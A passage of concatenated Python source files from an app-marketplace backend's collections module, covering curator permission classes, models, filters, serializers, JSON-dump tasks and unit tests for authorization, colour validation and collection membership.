- All users may make GET, HEAD, OPTIONS requests.
- Users with Collections:Curate may make any request.
- Users in Collection().curators may make any request using a verb in the
curator_verbs property.
Note: rest-framework does not allow for situations where a user fails
has_permission but passes has_object_permission, so the logic
determining whether a user is a curator or has the Collections:Curate
permission is abstracted from those methods and situationally called in
each.
"""
allow_public_safe_requests = True
curator_verbs = ['POST', 'PUT', 'PATCH']
def is_public_safe_request(self, request):
return (self.allow_public_safe_requests and
request.method in SAFE_METHODS)
def is_curator_for(self, request, obj):
if isinstance(request.user, AnonymousUser):
return False
return (obj.has_curator(request.user) and request.method
in self.curator_verbs)
def has_curate_permission(self, request):
return acl.action_allowed(request, 'Collections', 'Curate')
def has_permission(self, request, view):
if self.is_public_safe_request(request):
return True
try:
obj = view.get_object()
except ImproperlyConfigured:
# i.e. We're calling get_object from a non-object view.
return self.has_curate_permission(request)
else:
return (self.has_curate_permission(request) or
self.is_curator_for(request, obj))
def has_object_permission(self, request, view, obj):
if (self.is_public_safe_request(request) or
self.has_curate_permission(request)):
return True
return self.is_curator_for(request, obj)
class StrictCuratorAuthorization(CuratorAuthorization):
"""
The same as CuratorAuthorization, with GET / HEAD / OPTIONS requests
disallowed for unauthorized users.
"""
allow_public_safe_requests = False
curator_verbs = CuratorAuthorization.curator_verbs + SAFE_METHODS
class CanBeHeroAuthorization(BasePermission):
"""
Only users with Collections:Curate can modify the can_be_hero field.
"""
def has_curate_permission(self, request):
return CuratorAuthorization().has_curate_permission(request)
def is_modifying_request(self, request):
return request.method in ('PUT', 'PATCH', 'POST',)
def hero_field_modified(self, request):
if request.method == 'POST' and 'can_be_hero' in request.POST:
return True
elif request.method in ('PATCH', 'POST', 'PUT'):
return (isinstance(request.DATA, dict) and 'can_be_hero' in
request.DATA.keys())
return False
def has_object_permission(self, request, view, obj):
"""
Returns false if the request is attempting to modify the can_be_hero
field and the authenticating use does not have the Collections:Curate
permission.
"""
return not (not self.has_curate_permission(request) and
self.is_modifying_request(request) and
self.hero_field_modified(request))
########NEW FILE########
__FILENAME__ = constants
from tower import ugettext_lazy as _lazy
COLLECTIONS_TYPE_BASIC = 0
COLLECTIONS_TYPE_FEATURED = 1
COLLECTIONS_TYPE_OPERATOR = 2
COLLECTION_TYPES = (
(COLLECTIONS_TYPE_BASIC, _lazy(u'Basic Collection')),
(COLLECTIONS_TYPE_FEATURED, _lazy(u'Featured App List')),
(COLLECTIONS_TYPE_OPERATOR, _lazy(u'Operator Shelf')),
)
########NEW FILE########
__FILENAME__ = fields
import re
from django.core import exceptions
from django.db.models.fields import CharField
from django.utils.translation import ugettext_lazy as _
class ColorField(CharField):
"""
Model field that only accepts 7-character hexadecimal color representations,
e.g. #FF0035.
"""
description = _('Hexadecimal color')
def __init__(self, *args, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 7)
self.default_error_messages.update({
'bad_hex': _('Must be a valid hex color code, e.g. #FF0035.'),
})
super(ColorField, self).__init__(*args, **kwargs)
def validate(self, value, model_instance):
if value and not re.match('^\#([0-9a-fA-F]{6})$', value):
raise exceptions.ValidationError(self.error_messages['bad_hex'])
########NEW FILE########
__FILENAME__ = filters
from django import forms
from django.core.validators import EMPTY_VALUES
from django_filters.filters import ChoiceFilter, ModelChoiceFilter
from django_filters.filterset import FilterSet
import amo
import mkt
from addons.models import Category
from mkt.api.forms import SluggableModelChoiceField
from mkt.collections.models import Collection
class SlugChoiceFilter(ChoiceFilter):
def __init__(self, *args, **kwargs):
self.choices_dict = kwargs.pop('choices_dict')
# Create a choice dynamically to allow None, slugs and ids.
slugs_choices = self.choices_dict.items()
ids_choices = [(v.id, v) for v in self.choices_dict.values()]
kwargs['choices'] = [(None, None)] + slugs_choices + ids_choices
return super(SlugChoiceFilter, self).__init__(*args, **kwargs)
def filter(self, qs, value):
if value == '' or value is None:
value = None
elif not value.isdigit():
# We are passed a slug, get the id by looking at the choices
# dict, defaulting to None if no corresponding value is found.
value = self.choices_dict.get(value, None)
if value is not None:
value = value.id
return qs.filter(**{self.name: value})
class SlugModelChoiceFilter(ModelChoiceFilter):
field_class = SluggableModelChoiceField
def filter(self, qs, value):
return qs.filter(**{'%s__%s' % (self.name, self.lookup_type): value})
class CollectionFilterSet(FilterSet):
# Note: the filter names must match what ApiSearchForm and CategoryViewSet
# are using.
carrier = SlugChoiceFilter(name='carrier',
choices_dict=mkt.carriers.CARRIER_MAP)
region = SlugChoiceFilter(name='region',
choices_dict=mkt.regions.REGION_LOOKUP)
cat = SlugModelChoiceFilter(name='category',
queryset=Category.objects.filter(type=amo.ADDON_WEBAPP),
sluggable_to_field_name='slug',)
class Meta:
model = Collection
# All fields are provided above, but django-filter needs Meta.field to
# exist.
fields = []
def get_queryset(self):
"""
Return the queryset to use for the filterset.
Copied from django-filter qs property, modified to support filtering on
'empty' values, at the expense of multi-lookups like 'x < 4 and x > 2'.
"""
valid = self.is_bound and self.form.is_valid()
if self.strict and self.is_bound and not valid:
qs = self.queryset.none()
qs.filter_errors = self.form.errors
return qs
# Start with all the results and filter from there.
qs = self.queryset.all()
for name, filter_ in self.filters.items():
if valid:
if name in self.form.data:
value = self.form.cleaned_data[name]
else:
continue
else:
raw_value = self.form[name].value()
try:
value = self.form.fields[name].clean(raw_value)
except forms.ValidationError:
if self.strict:
return self.queryset.none()
else:
continue
# At this point we should have valid & clean data.
qs = filter_.filter(qs, value)
# Optional ordering.
if self._meta.order_by:
order_field = self.form.fields[self.order_by_field]
data = self.form[self.order_by_field].data
ordered = None
try:
ordered = order_field.clean(data)
except forms.ValidationError:
pass
if ordered in EMPTY_VALUES and self.strict:
ordered = self.form.fields[self.order_by_field].choices[0][0]
if ordered:
qs = qs.order_by(*self.get_order_by(ordered))
return qs
@property
def qs(self):
if hasattr(self, '_qs'):
return self._qs
self._qs = self.get_queryset()
return self._qs
class CollectionFilterSetWithFallback(CollectionFilterSet):
"""
FilterSet with a fallback mechanism, dropping filters in a certain order
if no results are found.
"""
# Combinations of fields to try to set to NULL, in order, when no results
# are found. See `next_fallback()`.
fields_fallback_order = (
('region',),
('carrier',),
('region', 'carrier',)
)
def next_fallback(self):
"""
Yield the next set of filters to set to NULL when refiltering the
queryset to find results. See `refilter_queryset()`.
"""
for f in self.fields_fallback_order:
yield f
def refilter_queryset(self):
"""
Reset self.data, then override fields yield by the `fallback` generator
to NULL. Then recall the `qs` property and return it.
When we are using this FilterSet, we really want to return something,
even if it's less relevant to the original query. When the `qs`
property is evaluated, if no results are found, it will call this
method to refilter the queryset in order to find /something/.
Can raise StopIteration if the fallback generator is exhausted.
"""
self.data = self.original_data.copy()
self.fields_to_null = next(self.fallback)
for field in self.fields_to_null:
if field in self.data:
self.data[field] = None
del self._form
return self.qs
def __init__(self, *args, **kwargs):
super(CollectionFilterSetWithFallback, self).__init__(*args, **kwargs)
self.original_data = self.data.copy()
self.fallback = self.next_fallback()
self.fields_to_null = None
@property
def qs(self):
if hasattr(self, '_qs'):
return self._qs
qs = self.get_queryset()
if hasattr(qs, 'filter_errors'):
# Immediately return if there was an error.
self._qs = qs
return self._qs
elif not qs.exists():
try:
qs = self.refilter_queryset()
except StopIteration:
pass
self._qs = qs
self._qs.filter_fallback = self.fields_to_null
return self._qs
########NEW FILE########
__FILENAME__ = managers
from amo.models import ManagerBase
class PublicCollectionsManager(ManagerBase):
def get_query_set(self):
qs = super(PublicCollectionsManager, self).get_query_set()
return qs.filter(is_public=True)
########NEW FILE########
__FILENAME__ = models
import os
from django.conf import settings
from django.db import models
import amo.models
import mkt.carriers
import mkt.regions
from addons.models import Addon, Category, clean_slug
from amo.decorators import use_master
from amo.models import SlugField
from amo.utils import to_language
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import index_webapps
from translations.fields import PurifiedField, save_signal
from .constants import COLLECTION_TYPES
from .fields import ColorField
from .managers import PublicCollectionsManager
class Collection(amo.models.ModelBase):
# `collection_type` for rocketfuel, not transonic.
collection_type = models.IntegerField(choices=COLLECTION_TYPES)
description = PurifiedField()
name = PurifiedField()
is_public = models.BooleanField(default=False)
# FIXME: add better / composite indexes that matches the query we are
# going to make.
category = models.ForeignKey(Category, null=True, blank=True)
region = models.PositiveIntegerField(default=None, null=True, blank=True,
choices=mkt.regions.REGIONS_CHOICES_ID, db_index=True)
carrier = models.IntegerField(default=None, null=True, blank=True,
choices=mkt.carriers.CARRIER_CHOICES, db_index=True)
author = models.CharField(max_length=255, default='', blank=True)
slug = SlugField(blank=True, max_length=30,
help_text='Used in collection URLs.')
default_language = models.CharField(max_length=10,
choices=((to_language(lang), desc)
for lang, desc in settings.LANGUAGES.items()),
default=to_language(settings.LANGUAGE_CODE))
curators = models.ManyToManyField('users.UserProfile')
background_color = ColorField(null=True)
text_color = ColorField(null=True)
image_hash = models.CharField(default=None, max_length=8, null=True)
can_be_hero = models.BooleanField(default=False, help_text=(
'Indicates whether an operator shelf collection can be displayed with'
'a hero graphic'))
_apps = models.ManyToManyField(Webapp, through='CollectionMembership',
related_name='app_collections')
objects = amo.models.ManagerBase()
public = PublicCollectionsManager()
class Meta:
db_table = 'app_collections'
ordering = ('-id',) # This will change soon since we'll need to be
# able to order collections themselves, but this
# helps tests for now.
def __unicode__(self):
return self.name.localized_string_clean
def save(self, **kw):
self.clean_slug()
return super(Collection, self).save(**kw)
@use_master
def clean_slug(self):
clean_slug(self, 'slug')
@classmethod
def get_fallback(cls):
return cls._meta.get_field('default_language')
def image_path(self):
return os.path.join(settings.COLLECTIONS_ICON_PATH,
str(self.pk / 1000),
'app_collection_%s.png' % (self.pk,))
def apps(self):
"""
Public apps on the collection, ordered by their position in the
CollectionMembership model.
Use this method everytime you want to display apps for a collection to
an user.
"""
return self._apps.filter(disabled_by_user=False,
status=amo.STATUS_PUBLIC).order_by('collectionmembership')
def add_app(self, app, order=None):
"""
Add an app to this collection. If specified, the app will be created
with the specified `order`. If not, it will be added to the end of the
collection.
"""
qs = CollectionMembership.objects.filter(collection=self)
if order is None:
aggregate = qs.aggregate(models.Max('order'))['order__max']
order = aggregate + 1 if aggregate is not None else 0
rval = CollectionMembership.objects.create(collection=self, app=app,
order=order)
# Help django-cache-machine: it doesn't like many 2 many relations,
# the cache is never invalidated properly when adding a new object.
CollectionMembership.objects.invalidate(*qs)
index_webapps.delay([app.pk])
return rval
def remove_app(self, app):
"""
Remove the passed app from this collection, returning a boolean
indicating whether a successful deletion took place.
"""
try:
membership = self.collectionmembership_set.get(app=app)
except CollectionMembership.DoesNotExist:
return False
else:
membership.delete()
index_webapps.delay([app.pk])
return True
def reorder(self, new_order):
"""
Passed a list of app IDs, e.g.
[18, 24, 9]
will change the order of each item in the collection to match the
passed order. A ValueError will be raised if each app in the
collection is not included in the ditionary.
"""
existing_pks = self.apps().no_cache().values_list('pk', flat=True)
if set(existing_pks) != set(new_order):
raise ValueError('Not all apps included')
for order, pk in enumerate(new_order):
CollectionMembership.objects.get(collection=self,
app_id=pk).update(order=order)
index_webapps.delay(new_order)
def has_curator(self, userprofile):
"""
Returns boolean indicating whether the passed user profile is a curator
on this collection.
ID comparison used instead of directly checking objects to ensure that
UserProfile objects could be passed.
"""
return userprofile.id in self.curators.values_list('id', flat=True)
def add_curator(self, userprofile):
ret = self.curators.add(userprofile)
Collection.objects.invalidate(*self.curators.all())
return ret
def remove_curator(self, userprofile):
ret = self.curators.remove(userprofile)
Collection.objects.invalidate(*self.curators.all())
return ret
@property
def has_image(self):
return bool(self.image_hash)
class CollectionMembership(amo.models.ModelBase):
collection = models.ForeignKey(Collection)
app = models.ForeignKey(Webapp)
order = models.SmallIntegerField(null=True)
def __unicode__(self):
return u'"%s" in "%s"' % (self.app.name, self.collection.name)
class Meta:
db_table = 'app_collection_membership'
unique_together = ('collection', 'app',)
ordering = ('order',)
def remove_deleted_apps(*args, **kwargs):
instance = kwargs.get('instance')
CollectionMembership.objects.filter(app_id=instance.pk).delete()
# Save translations when saving a Collection.
models.signals.pre_save.connect(save_signal, sender=Collection,
dispatch_uid='collection_translations')
# Delete collection membership when deleting an app (sender needs to be Addon,
# not Webapp, because that's the real model underneath).
models.signals.post_delete.connect(remove_deleted_apps, sender=Addon,
dispatch_uid='apps_collections_cleanup')
########NEW FILE########
__FILENAME__ = serializers
# -*- coding: utf-8 -*-
import hashlib
import os
import uuid
from rest_framework import serializers
from rest_framework.fields import get_component
from rest_framework.reverse import reverse
from tower import ugettext_lazy as _
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import File
from django.core.files.storage import default_storage as storage
import amo
import mkt
from addons.models import Category
from mkt.api.fields import (SlugChoiceField, SlugModelChoiceField,
TranslationSerializerField)
from mkt.features.utils import get_feature_profile
from mkt.search.serializers import SimpleESAppSerializer
from mkt.webapps.serializers import SimpleAppSerializer
from mkt.webapps.models import Webapp
from users.models import UserProfile
from .models import Collection
from .constants import COLLECTIONS_TYPE_FEATURED, COLLECTIONS_TYPE_OPERATOR
class CollectionMembershipField(serializers.RelatedField):
"""
RelatedField subclass that serializes apps in a Collection, taking into
account feature profile and optionally relying on ElasticSearch to find
the apps instead of making a DB query.
Specifically created for use with CollectionSerializer; you probably don't
want to use this elsewhere.
"""
app_serializer_classes = {
'es': SimpleESAppSerializer,
'normal': SimpleAppSerializer,
}
def to_native(self, qs, use_es=False):
if use_es:
serializer_class = self.app_serializer_classes['es']
else:
serializer_class = self.app_serializer_classes['normal']
# To work around elasticsearch default limit of 10, hardcode a higher
# limit.
return serializer_class(qs[:100], context=self.context, many=True).data
def _get_device(self, request):
# Fireplace sends `dev` and `device`. See the API docs. When
# `dev` is 'android' we also need to check `device` to pick a device
# object.
dev = request.GET.get('dev')
device = request.GET.get('device')
if dev == 'android' and device:
dev = '%s-%s' % (dev, device)
return amo.DEVICE_LOOKUP.get(dev)
def field_to_native(self, obj, field_name):
if not hasattr(self, 'context') or not 'request' in self.context:
raise ImproperlyConfigured('Pass request in self.context when'
' using CollectionMembershipField.')
request = self.context['request']
# Having 'use-es-for-apps' in the context means the parent view wants
# us to use ES to fetch the apps. If that key is present, check that we
# have a view in the context and that the waffle flag is active. If
# everything checks out, bypass the db and use ES to fetch apps for a
# nice performance boost.
if self.context.get('use-es-for-apps') and self.context.get('view'):
return self.field_to_native_es(obj, request)
qs = get_component(obj, self.source)
# Filter apps based on device and feature profiles.
device = self._get_device(request)
profile = get_feature_profile(request)
if device and device != amo.DEVICE_DESKTOP:
qs = qs.filter(addondevicetype__device_type=device.id)
if profile:
qs = qs.filter(**profile.to_kwargs(
prefix='_current_version__features__has_'))
return self.to_native(qs)
def field_to_native_es(self, obj, request):
"""
A version of field_to_native that uses ElasticSearch to fetch the apps
belonging to the collection instead of SQL.
Relies on a FeaturedSearchView instance in self.context['view']
to properly rehydrate results returned by ES.
"""
profile = get_feature_profile(request)
region = self.context['view'].get_region_from_request(request)
device = self._get_device(request)
_rget = lambda d: getattr(request, d, False)
qs = Webapp.from_search(request, region=region, gaia=_rget('GAIA'),
mobile=_rget('MOBILE'), tablet=_rget('TABLET'))
filters = {'collection.id': obj.pk}
if device and device != amo.DEVICE_DESKTOP:
filters['device'] = device.id
if profile:
filters.update(**profile.to_kwargs(prefix='features.has_'))
qs = qs.filter(**filters).order_by({
'collection.order': {
'order': 'asc',
'nested_filter': {
'term': {'collection.id': obj.pk}
}
}
})
return self.to_native(qs, use_es=True)
class CollectionImageField(serializers.HyperlinkedRelatedField):
read_only = True
def get_url(self, obj, view_name, request, format):
if obj.has_image:
# Always prefix with STATIC_URL to return images from our CDN.
prefix = settings.STATIC_URL.strip('/')
# Always append image_hash so that we can send far-future expires.
suffix = '?%s' % obj.image_hash
url = reverse(view_name, kwargs={'pk': obj.pk}, request=request,
format=format)
return '%s%s%s' % (prefix, url, suffix)
else:
return None
class CollectionSerializer(serializers.ModelSerializer):
name = TranslationSerializerField(min_length=1)
description = TranslationSerializerField()
slug = serializers.CharField(required=False)
collection_type = serializers.IntegerField()
apps = CollectionMembershipField(many=True, source='apps')
image = CollectionImageField(
source='*',
view_name='collection-image-detail',
format='png')
carrier = SlugChoiceField(required=False, empty=None,
choices_dict=mkt.carriers.CARRIER_MAP)
region = SlugChoiceField(required=False, empty=None,
choices_dict=mkt.regions.REGION_LOOKUP)
category = SlugModelChoiceField(required=False,
queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
class Meta:
fields = ('apps', 'author', 'background_color', 'can_be_hero',
'carrier', 'category', 'collection_type', 'default_language',
'description', 'id', 'image', 'is_public', 'name', 'region',
'slug', 'text_color',)
model = Collection
def to_native(self, obj):
"""
Remove `can_be_hero` from the serialization if this is not an operator
shelf.
"""
native = super(CollectionSerializer, self).to_native(obj)
if native['collection_type'] != COLLECTIONS_TYPE_OPERATOR:
del native['can_be_hero']
return native
def validate(self, attrs):
"""
Prevent operator shelves from being associated with a category.
"""
existing = getattr(self, 'object')
exc = 'Operator shelves may not be associated with a category.'
if (not existing and attrs['collection_type'] ==
COLLECTIONS_TYPE_OPERATOR and attrs.get('category')):
raise serializers.ValidationError(exc)
elif existing:
collection_type = attrs.get('collection_type',
existing.collection_type)
category = attrs.get('category', existing.category)
if collection_type == COLLECTIONS_TYPE_OPERATOR and category:
raise serializers.ValidationError(exc)
return attrs
def full_clean(self, instance):
instance = super(CollectionSerializer, self).full_clean(instance)
if not instance:
return None
# For featured apps and operator shelf collections, we need to check if
# one already exists for the same region/category/carrier combination.
#
# Sadly, this can't be expressed as a db-level unique constraint,
# because this doesn't apply to basic collections.
#
# We have to do it ourselves, and we need the rest of the validation
# to have already taken place, and have the incoming data and original
# data from existing instance if it's an edit, so full_clean() is the
# best place to do it.
unique_collections_types = (COLLECTIONS_TYPE_FEATURED,
COLLECTIONS_TYPE_OPERATOR)
qs = Collection.objects.filter(
collection_type=instance.collection_type,
category=instance.category,
region=instance.region,
carrier=instance.carrier)
if instance.pk:
qs = qs.exclude(pk=instance.pk)
if (instance.collection_type in unique_collections_types and
qs.exists()):
self._errors['collection_uniqueness'] = _(
u'You can not have more than one Featured Apps/Operator Shelf '
u'collection for the same category/carrier/region combination.'
)
return instance
class CuratorSerializer(serializers.ModelSerializer):
class Meta:
fields = ('display_name', 'email', 'id')
model = UserProfile
class DataURLImageField(serializers.CharField):
def from_native(self, data):
if not data.startswith('data:'):
raise serializers.ValidationError('Not a data URI.')
metadata, encoded = data.rsplit(',', 1)
parts = metadata.rsplit(';', 1)
if parts[-1] == 'base64':
content = encoded.decode('base64')
tmp_dst = os.path.join(settings.TMP_PATH, 'icon', uuid.uuid4().hex)
with storage.open(tmp_dst, 'wb') as f:
f.write(content)
tmp = File(storage.open(tmp_dst))
hash_ = hashlib.md5(content).hexdigest()[:8]
return serializers.ImageField().from_native(tmp), hash_
else:
raise serializers.ValidationError('Not a base64 data URI.')
def to_native(self, value):
return value.name
########NEW FILE########
__FILENAME__ = tasks
import json
import logging
import os
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from celeryutils import task
from rest_framework import serializers
from test_utils import RequestFactory
from amo.utils import chunked, JSONEncoder
from mkt.collections.models import Collection
from mkt.collections.serializers import CollectionSerializer
from mkt.constants.regions import RESTOFWORLD
from mkt.webapps.models import Webapp
task_log = logging.getLogger('collections.tasks')
class ShortAppSerializer(serializers.ModelSerializer):
pk = serializers.IntegerField()
filepath = serializers.SerializerMethodField('get_filepath')
class Meta:
model = Webapp
fields = ('pk', 'filepath')
def get_filepath(self, obj):
return os.path.join('apps', object_path(obj))
class ShortAppsCollectionSerializer(CollectionSerializer):
apps = ShortAppSerializer(many=True, read_only=True, source='apps')
def object_path(obj):
return os.path.join(str(obj.pk / 1000), '{pk}.json'.format(pk=obj.pk))
def collection_filepath(collection):
return os.path.join(settings.DUMPED_APPS_PATH,
'collections',
object_path(collection))
def collection_data(collection):
request = RequestFactory().get('/')
request.user = AnonymousUser()
request.REGION = RESTOFWORLD
return ShortAppsCollectionSerializer(collection,
context={'request': request}).data
def write_file(filepath, output):
target_path = os.path.dirname(filepath)
if not os.path.exists(target_path):
os.makedirs(target_path)
with open(filepath, 'w') as f:
f.write(output)
return filepath
def dump_collection(collection):
target_file = collection_filepath(collection)
task_log.info('Dumping collection {0} to {1}'.format(collection.pk,
target_file))
json_collection = json.dumps(collection_data(collection),
cls=JSONEncoder)
return write_file(target_file, json_collection)
@task(ignore_result=False)
def dump_collections(pks):
return [dump_collection(collection)
for collection in Collection.public.filter(pk__in=pks).iterator()]
def dump_all_collections_tasks():
all_pks = Collection.public.values_list('pk', flat=True).order_by('pk')
return [dump_collections.si(pks) for pks in chunked(all_pks, 100)]
########NEW FILE########
__FILENAME__ = test_authorization
import json
from urllib import urlencode
from nose.tools import ok_
from rest_framework.generics import GenericAPIView
from rest_framework.request import Request
from rest_framework.settings import api_settings
from access.middleware import ACLMiddleware
from amo.tests import TestCase
from users.models import UserProfile
from mkt.collections.authorization import (CanBeHeroAuthorization,
CuratorAuthorization,
StrictCuratorAuthorization)
from mkt.collections.tests import CollectionTestMixin
from mkt.site.fixtures import fixture
from test_utils import RequestFactory
class TestCuratorAuthorization(CollectionTestMixin, TestCase):
auth_class = CuratorAuthorization
fixtures = fixture('user_2519')
def setUp(self):
super(TestCuratorAuthorization, self).setUp()
self.collection = self.make_collection()
self.auth = self.auth_class()
self.user = UserProfile.objects.get(pk=2519)
self.profile = self.user
self.view = GenericAPIView()
def give_permission(self):
self.grant_permission(self.profile, 'Collections:Curate')
def make_curator(self):
self.collection.add_curator(self.profile)
def request(self, verb):
request = getattr(RequestFactory(), verb.lower())('/')
request.user = self.user
ACLMiddleware().process_request(request)
return request
def is_authorized(self, request):
return self.auth.has_permission(request, self.view)
def is_authorized_object(self, request):
return self.auth.has_object_permission(request, self.view,
self.collection)
def test_get_list(self):
ok_(self.is_authorized(self.request('GET')))
def test_get_list_permission(self):
self.give_permission()
ok_(self.is_authorized(self.request('GET')))
def test_post_list(self):
ok_(not self.is_authorized(self.request('POST')))
def test_post_list_permission(self):
self.give_permission()
ok_(self.is_authorized(self.request('POST')))
def test_delete_list(self):
ok_(not self.is_authorized(self.request('DELETE')))
def test_delete_list_permission(self):
self.give_permission()
ok_(self.is_authorized(self.request('DELETE')))
def test_get_detail(self):
ok_(self.is_authorized_object(self.request('GET')))
def test_get_detail_permission(self):
self.give_permission()
ok_(self.is_authorized_object(self.request('GET')))
def test_get_detail_curator(self):
self.make_curator()
ok_(self.is_authorized_object(self.request('GET')))
def test_get_detail_permission_curator(self):
self.give_permission()
self.make_curator()
ok_(self.is_authorized_object(self.request('GET')))
def test_post_detail(self):
ok_(not self.is_authorized_object(self.request('POST')))
def test_post_detail_permission(self):
self.give_permission()
ok_(self.is_authorized_object(self.request('POST')))
def test_post_detail_curator(self):
self.make_curator()
ok_(self.is_authorized_object(self.request('POST')))
def test_post_detail_permission_curator(self):
self.give_permission()
self.make_curator()
ok_(self.is_authorized_object(self.request('POST')))
def test_delete_detail(self):
ok_(not self.is_authorized_object(self.request('DELETE')))
def test_delete_detail_permission(self):
self.give_permission()
ok_(self.is_authorized_object(self.request('DELETE')))
def test_delete_detail_curator(self):
self.make_curator()
ok_(not self.is_authorized_object(self.request('DELETE')))
def test_delete_detail_permission_curator(self):
self.give_permission()
self.make_curator()
ok_(self.is_authorized_object(self.request('DELETE')))
class TestStrictCuratorAuthorization(TestCuratorAuthorization):
auth_class = StrictCuratorAuthorization
def test_get_list(self):
ok_(not self.is_authorized(self.request('GET')))
def test_get_detail(self):
ok_(not self.is_authorized_object(self.request('GET')))
class TestCanBeHeroAuthorization(CollectionTestMixin, TestCase):
enforced_verbs = ['POST', 'PUT']
fixtures = fixture('user_2519')
def setUp(self):
super(TestCanBeHeroAuthorization, self).setUp()
self.collection = self.make_collection()
self.auth = CanBeHeroAuthorization()
self.user = UserProfile.objects.get(pk=2519)
self.profile = self.user
self.view = GenericAPIView()
def give_permission(self):
self.grant_permission(self.profile, 'Collections:Curate')
def is_authorized_object(self, request):
return self.auth.has_object_permission(request, self.view,
self.collection)
def request(self, verb, qs=None, content_type='application/json',
encoder=json.dumps, **data):
if not qs:
qs = ''
request = getattr(RequestFactory(), verb.lower())
request = request('/?' + qs, content_type=content_type,
data=encoder(data) if data else '')
request.user = self.user
ACLMiddleware().process_request(request)
return Request(request, parsers=[parser_cls() for parser_cls in
api_settings.DEFAULT_PARSER_CLASSES])
def test_unenforced(self):
"""
Should always pass for GET requests.
"""
ok_(self.is_authorized_object(self.request('GET')))
def test_no_qs_modification(self):
"""
Non-GET requests should not be rejected if there is a can_be_true
querystring param (which hypothetically shouldn't do anything).
We're effectively testing that request.GET doesn't bleed into
request.POST.
"""
self.give_permission()
for verb in self.enforced_verbs:
request = self.request(verb, qs='can_be_hero=1')
ok_(not self.auth.hero_field_modified(request), verb)
def test_change_permission(self):
"""
Should pass if the user is attempting to modify the can_be_hero field
and has the permission.
"""
self.give_permission()
for verb in self.enforced_verbs:
request = self.request(verb, can_be_hero=True)
ok_(self.auth.hero_field_modified(request), verb)
def test_change_permission_urlencode(self):
"""
Should pass if the user is attempting to modify the can_be_hero field
and has the permission.
"""
self.give_permission()
for verb in self.enforced_verbs:
request = self.request(verb, encoder=urlencode,
content_type='application/x-www-form-urlencoded',
can_be_hero=True)
ok_(self.auth.hero_field_modified(request), verb)
def test_no_change_no_permission(self):
"""
Should pass if the user does not have the permission and is not
attempting to modify the can_be_hero field.
"""
for verb in self.enforced_verbs:
request = self.request(verb)
ok_(self.is_authorized_object(request), verb)
def test_no_change(self):
"""
Should pass if the user does have the permission and is not attempting
to modify the can_be_hero field.
"""
self.give_permission()
for verb in self.enforced_verbs:
request = self.request(verb)
ok_(self.is_authorized_object(request), verb)
def test_post_change_no_permission(self):
"""
Should not pass if the user is attempting to modify the can_be_hero
field without the permission.
"""
for verb in self.enforced_verbs:
request = self.request(verb, can_be_hero=True)
ok_(not self.is_authorized_object(request), verb)
########NEW FILE########
__FILENAME__ = test_fields
from django.core import exceptions
import amo.tests
from mkt.collections.fields import ColorField
class TestColorField(amo.tests.TestCase):
def setUp(self):
self.field = ColorField()
def test_validation_letters_after_f(self):
with self.assertRaises(exceptions.ValidationError):
self.field.validate('#GGGGGG', None)
def test_validation_too_short(self):
with self.assertRaises(exceptions.ValidationError):
self.field.validate('#00000', None)
def test_validation_no_pound(self):
with self.assertRaises(exceptions.ValidationError):
self.field.validate('FF00FF', None)
def should_pass(self, val):
try:
self.field.validate(val, None)
except exceptions.ValidationError:
self.fail('Value "%s" should pass validation.')
def test_validation_passes(self):
for value in ['#010101', '#FF00FF', '#FFFFFF']:
self.should_pass(value)
########NEW FILE########
__FILENAME__ = test_managers
from nose.tools import ok_
import amo.tests
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
class TestPublicCollectionsManager(amo.tests.TestCase):
def setUp(self):
self.public_collection = Collection.objects.create(**{
'name': 'Public',
'description': 'The public one',
'is_public': True,
'collection_type': COLLECTIONS_TYPE_BASIC
})
self.private_collection = Collection.objects.create(**{
'name': 'Private',
'description': 'The private one',
'is_public': False,
'collection_type': COLLECTIONS_TYPE_BASIC
})
def test_public(self):
qs = Collection.public.all()
ok_(self.public_collection in qs)
ok_(self.private_collection not in qs)
########NEW FILE########
__FILENAME__ = test_models
from mock import patch
from nose.tools import eq_
import amo.tests
from mkt.collections.constants import COLLECTIONS_TYPE_FEATURED
from mkt.collections.models import Collection, CollectionMembership
class TestCollection(amo.tests.TestCase):
def setUp(self):
self.collection_data = {
'background_color': '#FF00FF',
'collection_type': COLLECTIONS_TYPE_FEATURED,
'description': 'A collection of my favourite games',
'name': 'My Favourite Games',
'slug': 'my-favourite-games',
'text_color': '#00FF00',
}
self.collection = Collection.objects.create(**self.collection_data)
def test_save(self):
self.collection = Collection.objects.all()[0]
self.collection.save()
@patch('mkt.collections.models.index_webapps.delay')
def _add_apps(self, mocked_index_webapps):
for app in self.apps:
self.collection.add_app(app)
mocked_index_webapps.assert_called_with([app.pk])
def _generate_apps(self):
self.apps = [amo.tests.app_factory() for n in xrange(1, 5)]
def test_collection(self):
for name, value in self.collection_data.iteritems():
eq_(self.collection_data[name], getattr(self.collection, name))
def test_collection_no_colors(self):
self.collection_data.pop('background_color')
self.collection_data.pop('text_color')
self.collection_data['slug'] = 'favorite-games-2'
self.collection = Collection.objects.create(**self.collection_data)
self.test_collection()
@patch('mkt.collections.models.index_webapps.delay')
def test_add_app_order_override(self, mocked_index_webapps):
self._generate_apps()
added = self.collection.add_app(self.apps[1], order=3)
mocked_index_webapps.assert_called_with([self.apps[1].pk])
eq_(added.order, 3)
eq_(added.app, self.apps[1])
eq_(added.collection, self.collection)
added = self.collection.add_app(self.apps[2], order=1)
mocked_index_webapps.assert_called_with([self.apps[2].pk])
eq_(added.order, 1)
eq_(added.app, self.apps[2])
eq_(added.collection, self.collection)
eq_(list(self.collection.apps()), [self.apps[2], self.apps[1]])
def test_apps(self):
self._generate_apps()
# First fetch the apps. Depending CACHE_EMPTY_QUERYSETS an empty list
# will be cached, or not.
self.assertSetEqual(self.collection.apps(), [])
eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
[])
# Add an app and re-check the apps list. Regardless of whether caching
# took place in the previous step, we should get a new, up to date apps
# list.
self.collection.add_app(self.apps[0])
self.assertSetEqual(self.collection.apps(), [self.apps[0]])
eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
[0])
# Add an app again. This time we know for sure caching took place in
# the previous step, and we still want to get the new, up to date apps
# list.
self.collection.add_app(self.apps[1])
self.assertSetEqual(self.collection.apps(),
[self.apps[0], self.apps[1]])
eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
[0, 1])
# Add and test the rest of the apps in one go.
self.collection.add_app(self.apps[2])
